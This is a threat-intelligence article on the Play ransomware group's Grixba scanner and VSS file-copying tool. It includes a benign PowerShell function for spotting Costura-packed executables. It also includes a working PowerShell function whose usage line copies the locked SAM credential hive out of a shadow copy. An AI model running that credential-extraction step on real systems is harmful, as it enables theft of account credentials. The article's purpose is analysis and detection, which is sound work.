Play Ransomware Group Deploys Custom Tools to Extract Data from Locked Systems


The Play ransomware group has developed two custom tools that it uses inside compromised networks: one enumerates users and computers in the domain and inventories installed software, the other copies files out of Volume Shadow Copy Service (VSS) snapshots, including files that the operating system normally keeps locked. Researchers at Symantec discovered the tools, which are designed to make intrusions more efficient and reduce dwell time, giving the operators tighter control over each attack.

The first tool, Grixba (Infostealer.Grixba), is a network-scanning tool that enumerates all users and computers in a domain. It is built with Costura, a .NET (Fody) add-in that embeds an application's dependencies as resources inside a single executable. The malware checks for the presence of security and backup software, remote administration tools, and other programs, and saves what it finds in CSV files that are compressed into a ZIP archive for later manual exfiltration by the threat actors.

Grixba operates in three modes: Scan, Scanall, and Clr. Scan mode checks for a specific list of security programs, backup software, and remote administration tools, while Scanall mode widens the search to a broader list of programs. Clr mode deletes logs on local and remote computers, enumerating specific registry keys to locate the logs it removes.
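Because both Play tools are packed with Costura, an analyst who has a suspicious .NET executable can get a first read on what it bundles before running it. Costura stores each embedded dependency as a manifest resource named `costura.<assembly>.dll` (or `costura.<assembly>.dll.compressed` when compression is on), and those names sit in the assembly's #Strings heap as plain UTF-8, so a byte-level search is enough to list them. The following PowerShell function is an added triage example, not Symantec's or the Play group's code; the file paths in the usage line are assumptions.

```powershell
# Added example: list Costura-embedded assemblies in a .NET executable by
# scanning the raw bytes for the resource-name pattern. This is a triage
# heuristic, not a parser of the .NET metadata tables.
function Get-CosturaEmbeddedAssemblies {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipelineByPropertyName)]
        [Alias('FullName')]
        [string]$Path
    )
    process {
        $bytes = [System.IO.File]::ReadAllBytes($Path)
        # Latin-1 (code page 28591) maps every byte to exactly one character,
        # so ASCII resource names survive and offsets are preserved.
        $text = [System.Text.Encoding]::GetEncoding(28591).GetString($bytes)
        # Group 1 is the embedded assembly's name; the optional suffix tells
        # us whether Costura compressed it.
        $pattern = 'costura\.([A-Za-z0-9_.\-]+?)\.dll(?:\.compressed)?'
        foreach ($m in [regex]::Matches($text, $pattern)) {
            [pscustomobject]@{
                File       = $Path
                Assembly   = $m.Groups[1].Value
                Compressed = $m.Value.EndsWith('.compressed')
            }
        }
    }
}

# Usage (hypothetical triage folder): every Costura-packed sample in the
# folder, with the libraries it carries. A hit on a VSS wrapper such as
# AlphaVSS in an executable that has no business touching snapshots is
# the kind of lead worth pulling.
Get-ChildItem 'C:\Triage\*.exe' |
    Get-CosturaEmbeddedAssemblies |
    Sort-Object File, Assembly -Unique |
    Format-Table -AutoSize
```

Costura is a legitimate and widely used packaging tool, so a match is a pivot for further analysis, not a verdict; the value is in seeing which dependencies a sample carries without loading it.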

The second tool, a VSS copying tool, was also built with Costura. It embeds the AlphaVSS library, a .NET wrapper that gives managed code a high-level interface to the VSS COM API, into the executable. With it the attackers can copy files out of VSS snapshots on compromised machines before encryption, reaching files that the operating system would normally refuse to let them read because another process holds them open.
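The trick the tool relies on is that a shadow copy is a point-in-time image of the volume rather than the live file system, so a file that is locked on the live volume (a registry hive, a database, a mailbox store) can be read freely through the snapshot's device path. The PowerShell function below reproduces that effect with the Win32_ShadowCopy WMI class and cmd.exe's copy command, which is the long-documented administrator and forensics route; it is an added illustration, not the Play group's tool, which drives VSS through AlphaVSS instead. It must run elevated, and the source and destination paths in the usage line are assumptions.

```powershell
# Added example: copy a locked file by snapshotting its volume with VSS and
# reading the file from the snapshot's device object instead of the live
# volume. Requires an elevated PowerShell session on Windows.
function Copy-FileFromShadowCopy {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string]$SourcePath,       # e.g. C:\Windows\System32\config\SAM
        [Parameter(Mandatory)] [string]$DestinationPath,  # where the copy should land
        [switch]$KeepSnapshot                             # leave the snapshot in place afterwards
    )

    # Volume root of the source file, e.g. "C:\".
    $volume = (Split-Path -Qualifier $SourcePath) + '\'
    $relative = $SourcePath.Substring($volume.Length)

    # Create a read-only, point-in-time snapshot of the whole volume.
    $create = Invoke-CimMethod -ClassName Win32_ShadowCopy -MethodName Create `
                -Arguments @{ Volume = $volume; Context = 'ClientAccessible' }
    if ($create.ReturnValue -ne 0) {
        throw "Win32_ShadowCopy.Create failed with code $($create.ReturnValue)"
    }
    $shadow = Get-CimInstance -ClassName Win32_ShadowCopy -Filter "ID='$($create.ShadowID)'"

    try {
        # DeviceObject is \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopyN.
        # Nothing holds files open inside the snapshot, so a plain copy through
        # that path succeeds even when the live file is locked.
        $shadowPath = $shadow.DeviceObject + '\' + $relative
        & cmd.exe /c copy /y "$shadowPath" "$DestinationPath" | Out-Null
        if ($LASTEXITCODE -ne 0) {
            throw "copy from $shadowPath failed with exit code $LASTEXITCODE"
        }
    }
    finally {
        # Clean up the snapshot unless the caller wants to keep it for more reads.
        if (-not $KeepSnapshot) { Remove-CimInstance -InputObject $shadow }
    }

    Get-Item -LiteralPath $DestinationPath
}

# Usage (hypothetical paths): pull the SAM hive, which the live system keeps locked.
Copy-FileFromShadowCopy -SourcePath 'C:\Windows\System32\config\SAM' `
                        -DestinationPath 'C:\Temp\SAM.copy'
```

For defenders the useful observation is that nothing here requires a vulnerability: snapshot creation and deletion through Win32_ShadowCopy, and reads from HarddiskVolumeShadowCopy device paths, are ordinary administrative actions. Alerting on them only pays off when the process doing it is not a backup agent, which is why Symantec's note that the tool is custom and Costura-packed matters more than the VSS calls themselves.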

Play ransomware, also known as PlayCrypt and developed by a group Symantec tracks as Balloonfly, first appeared in June 2022. It has been responsible for numerous high-profile attacks and is known for exploiting Microsoft Exchange vulnerabilities for initial access. Play was also one of the first ransomware families to use intermittent encryption, which lets it render victims' files unusable faster by encrypting only parts of each file. Notably, Balloonfly appears to both develop the malware and carry out the attacks itself, since Play is not offered as ransomware-as-a-service.

The use of custom tools is on the rise among ransomware gangs, because tooling can be tailored to the specific environments they target, allowing faster and more efficient attacks. By keeping such tools proprietary and exclusive, the gangs preserve a competitive advantage over rivals and maximize their profits.